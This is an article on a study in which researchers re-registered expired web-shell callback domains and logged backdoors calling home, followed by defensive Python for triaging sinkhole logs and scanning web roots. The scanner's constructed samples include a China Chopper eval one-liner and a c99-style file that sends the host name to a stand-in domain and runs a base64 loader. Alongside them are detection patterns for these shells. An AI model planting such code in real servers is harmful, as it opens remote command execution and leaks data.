A recent study by WatchTowr Labs and the Shadowserver Foundation has highlighted a widely overlooked weakness: expired domains that are still hard-coded into malware and attack tools. To keep those domains from being re-registered by other attackers, the researchers bought more than 40 abandoned domains and logged callbacks from more than 4,000 compromised systems worldwide, which gives a sense of the scale of the problem.
Digital Backdoors: A Persistent Threat
Web shells are one of the most common kinds of backdoor: scripts implanted on a compromised web server that give an attacker remote access. They allow command execution, file management, and the launching of further attacks from the affected host.
What is most concerning is that many of these backdoors stay active for years and periodically reach out to domains that the attackers hard-coded into them. When those domains expire, anyone who registers them, whether a researcher or another attacker, inherits that traffic and, with it, a path back into the backdoors.
The Study: Hijacking Backdoor Control
Researchers from WatchTowr Labs, in collaboration with Shadowserver, ran an experiment to explore the implications of this abandoned infrastructure. They registered more than 40 domains that had previously controlled active backdoors and pointed them at a logging server to record every incoming connection.
Surprising Results
After the domains were registered, the compromised systems began calling back automatically to the new owners. The collected data revealed:
- More than 4,000 compromised systems attempting to connect.
- Backdoors on government servers in countries like China, Nigeria, and Bangladesh.
- Affected systems in universities in Thailand, South Korea, and China.
Among the identified tools were some notorious ones such as:
- r57shell and c99shell: full-featured PHP shells offering command execution, file management, and brute-force modules.
- China Chopper: a very small web shell popular among advanced persistent threat (APT) groups.
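To make the collection step concrete, here is an added example (not WatchTowr's or Shadowserver's tooling) of the kind of triage a sinkhole operator runs over its web-server logs once the expired domains resolve to its own server. It assumes the registered domains are served by an Apache-style server writing the combined log format with the served virtual host (`%v`) appended to each line, and that some backdoors report the compromised host's own URL in a query parameter, here called `u`; the parameter name, the log lines, the addresses and the host names are all constructed for the example.

```python
"""Sinkhole callback triage over web-server logs.

Added example, not WatchTowr's or Shadowserver's tooling. Assumptions:
  * the registered (former C2) domains are served by an Apache-style
    server writing the combined log format with the served virtual
    host (%v) appended at the end of each line;
  * some backdoors report the compromised host's own URL in a query
    parameter, here named ``u`` (a hypothetical stand-in).
The log lines, IPs and host names below are constructed for the demo.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
    r'(?: (?P<vhost>\S+))?$'
)

# Constructed sample: two callbacks from one government host, one bare
# beacon with no victim URL, one university host, and crawler noise.
SAMPLE_LOG = """\
203.0.113.10 - - [08/Jan/2025:10:00:01 +0000] "GET /?u=http%3A%2F%2Fportal.example.gov.bd%2Fuploads%2Fr57.php HTTP/1.1" 200 12 "-" "Mozilla/5.0" sinkhole-a.example
203.0.113.10 - - [08/Jan/2025:10:05:01 +0000] "GET /?u=http%3A%2F%2Fportal.example.gov.bd%2Fuploads%2Fr57.php HTTP/1.1" 200 12 "-" "Mozilla/5.0" sinkhole-a.example
198.51.100.7 - - [08/Jan/2025:10:00:09 +0000] "POST /cb.php HTTP/1.1" 200 12 "-" "-" sinkhole-b.example
192.0.2.44 - - [08/Jan/2025:10:01:30 +0000] "GET /?u=http%3A%2F%2Fcs.example.ac.th%2Fimg%2Fc99.php HTTP/1.1" 200 12 "-" "Mozilla/5.0" sinkhole-a.example
192.0.2.45 - - [08/Jan/2025:10:02:00 +0000] "GET /robots.txt HTTP/1.1" 404 0 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)" sinkhole-a.example
"""

GOV_LABELS = {"gov", "gob", "mil"}
EDU_LABELS = {"edu", "ac"}


def classify_sector(hostname: str) -> str:
    """Crude sector guess from DNS labels (example.gov.bd -> government)."""
    labels = set(hostname.lower().split("."))
    if labels & GOV_LABELS:
        return "government"
    if labels & EDU_LABELS:
        return "education"
    return "other"


def triage(log_text: str) -> dict:
    """Summarise who is calling back to the sinkholed domains."""
    beacon_ips = set()      # every non-crawler source address
    per_domain = Counter()  # callbacks per sinkholed domain (vhost)
    victims = {}            # compromised host -> set of shell paths it reported
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if "bot" in m["ua"].lower():   # crude crawler filter; tune for real data
            continue
        beacon_ips.add(m["ip"])
        per_domain[m["vhost"] or "(no vhost)"] += 1
        qs = parse_qs(urlsplit(m["target"]).query)   # parse_qs also URL-decodes
        if "u" in qs:
            reported = urlsplit(qs["u"][0])
            if reported.hostname:
                victims.setdefault(reported.hostname, set()).add(reported.path)
    sectors = Counter(classify_sector(h) for h in victims)
    return {
        "beacon_ips": len(beacon_ips),
        "per_domain": dict(per_domain),
        "victims": victims,
        "sectors": dict(sectors),
    }


if __name__ == "__main__":
    summary = triage(SAMPLE_LOG)
    print(f"{summary['beacon_ips']} distinct sources beaconed")
    for domain, n in summary["per_domain"].items():
        print(f"  {domain}: {n} callbacks")
    for host, paths in sorted(summary["victims"].items()):
        print(f"  victim {host} ({classify_sector(host)}): {', '.join(sorted(paths))}")
```

The distinction between `beacon_ips` and `victims` matters in practice: a source address that only beacons tells you a compromised machine exists but not which one (NAT, shared hosting), whereas a backdoor that reports its own URL identifies the exact host and shell path that a notification can be sent about.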
Implications of the Findings
The study highlights a key issue in modern cybersecurity: attackers rarely manage or retire the infrastructure they abandon. These orphaned backdoors could be reused by new cybercriminals to reach previously compromised systems, at no more cost than registering a domain.
Identified Issues
- Reusable Infrastructure: Attackers can take advantage of the prior work of other hackers simply by registering expired domains.
- Compromise of Sensitive Systems: The presence of backdoors on government and educational systems underscores the lack of effective controls on critical infrastructures.
- Global Impact: Compromised systems are not limited to a single sector or region, demonstrating the widespread nature of this problem.
A Proactive Solution: The Role of Shadowserver
After identifying the compromised systems, WatchTowr handed the registered domains over to the Shadowserver Foundation. This nonprofit, dedicated to internet security, now sinkholes all traffic from the affected systems to its own servers and keeps the domains registered so they cannot lapse back into malicious hands.
The Future of Cybersecurity and Abandoned Infrastructures
This case underscores that infrastructure has to be managed through its whole lifecycle, and that this holds even for infrastructure built for malicious purposes. The reuse of expired domains not only endangers the compromised systems but also shows how little attention the problem receives.
Key Recommendations
- Continuous Monitoring: Businesses and governments should audit their web roots and outbound traffic regularly to find backdoors and other weaknesses, since a shell planted years ago may still be calling home.
- Domain Management: Domains used for command-and-control, including those registered in security research such as this one, must be kept registered or handed to a sinkhole operator so that nobody else can re-register them.
- Global Collaboration: Cooperation between organizations like WatchTowr and Shadowserver demonstrates the importance of working together to mitigate risks.
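For the audit step in the first recommendation, here is an added example (not code from the page's sources) of a web-root sweep in Python. It flags files matching a small, constructed signature set for the families named above (China Chopper's `eval($_POST[...])` one-liner, `eval(base64_decode(...))` loaders, and the r57/c99 banner strings) and pulls out any hard-coded external host names from the flagged files, since those are exactly the callback domains that can expire and be re-registered. The sample PHP files are constructed for the demo; a real deployment should rely on a maintained YARA or similar rule set rather than these few patterns.

```python
"""Web-root sweep for common web shells and the hosts they call back to.

Added example; not WatchTowr's or Shadowserver's code. The signature
set is deliberately small and constructed for the families the article
names; use a maintained rule set (YARA etc.) in production. The PHP
files created by demo() are constructed samples, not real malware.
"""
import re
import tempfile
from pathlib import Path

SIGNATURES = {
    # China Chopper's server side is a one-liner evaluating a request parameter.
    "china_chopper": re.compile(r"@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[", re.I),
    # Obfuscated loader stanza used by many shells and droppers.
    "eval_base64": re.compile(
        r"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13)?\s*\(?\s*base64_decode\s*\(", re.I
    ),
    # r57 and c99 variants usually keep their banner string.
    "r57shell": re.compile(r"r57\s*shell", re.I),
    "c99shell": re.compile(r"c99\s*shell", re.I),
}

# Host part of any absolute http(s) URL embedded in the file.
HOST_RE = re.compile(r"https?://((?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)

SCAN_EXTS = (".php", ".phtml", ".php5", ".phar", ".inc")


def scan_file(path: Path):
    """Return a finding for one file, or None if nothing matched."""
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return None
    families = sorted(name for name, rx in SIGNATURES.items() if rx.search(text))
    if not families:
        return None
    # Only flagged files get their embedded hosts extracted: these are the
    # callback domains whose expiry would hand the shell to someone else.
    hosts = sorted({h.lower() for h in HOST_RE.findall(text)})
    return {"path": path.as_posix(), "families": families, "callback_hosts": hosts}


def scan_tree(root) -> list:
    """Walk a web root and collect findings with paths relative to it."""
    root = Path(root)
    findings = []
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in SCAN_EXTS:
            finding = scan_file(p)
            if finding:
                finding["path"] = p.relative_to(root).as_posix()
                findings.append(finding)
    return findings


# Constructed samples: a China Chopper one-liner, a benign template, and a
# c99-style shell with a hard-coded callback host and a base64 loader.
SAMPLE_FILES = {
    "uploads/img.php": "<?php @eval($_POST['pass']); ?>\n",
    "theme/footer.php": '<?php echo "<a href=\\"https://www.example.org/\\">home</a>"; ?>\n',
    "cache/x.php": (
        "<?php /* c99shell v1.0 beta */\n"
        "$cb = 'http://updates.example.net/check.php';\n"
        "@file_get_contents($cb . '?h=' . urlencode($_SERVER['HTTP_HOST']));\n"
        "eval(base64_decode('ZWNobyAxOw=='));\n"
    ),
}


def demo() -> list:
    """Write the samples to a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as d:
        for rel, body in SAMPLE_FILES.items():
            target = Path(d, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        return scan_tree(d)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}: {', '.join(f['families'])}; "
              f"callbacks -> {', '.join(f['callback_hosts']) or 'none'}")
```

The host list is the useful output for the domain-management recommendation: every external name a flagged shell embeds should be checked for registration status and, if it has lapsed or is about to, either blocked at the resolver or reported to a sinkhole operator before someone else picks it up.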
Conclusion
The discovery of more than 4,000 active backdoors calling back to expired domains exposes a serious weakness in today's digital security. Research of this kind shows the need to address not only active threats but also infrastructure that, despite being abandoned, continues to pose a significant risk. Proactive collaboration and responsible handling of the resulting data will be essential for strengthening global cybersecurity.
Source: WatchTowr and Bleeping Computer